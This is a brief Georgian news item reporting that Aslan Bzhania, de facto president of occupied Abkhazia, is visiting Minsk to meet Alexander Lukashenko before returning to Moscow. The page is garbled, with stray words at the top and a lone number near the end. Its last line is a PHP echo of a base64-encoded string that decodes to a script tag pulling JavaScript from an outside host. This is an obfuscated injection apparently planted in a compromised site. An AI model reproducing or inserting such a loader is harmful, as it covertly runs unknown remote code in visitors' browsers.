celsiusi
ავერსი შნაიდერი

ოკუპირებული აფხაზეთის ე.წ. პრეზიდენტი ბელარუსში იმყოფება. ინფორმაციას ასლან ბჟანიას "ადმინისტრაცია" ავრცელებს. როგორც განცხადებაშია აღნიშნული, ბჟანია მინსკში 20 თებერვალს ჩავიდა.

"ვიზიტის ფარგლებში დაგეგმილია ასლან ბჟანიასა და ალექსანდრე ლუკაშენკოს შორის შეხვედრა. შეხვედრაზე სახელმწიფოების მეთაურები მხარეებს შორის თანამშრომლობის საკითხებს განიხილავენ" - აღნიშნულია განცხადებაში.

ბჟანია-ლუკაშენკოს შეხვედრის შემდეგ, დე-ფაქტო პრეზიდენტი კვლავ მოსკოვში დაბრუნდება.

351
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");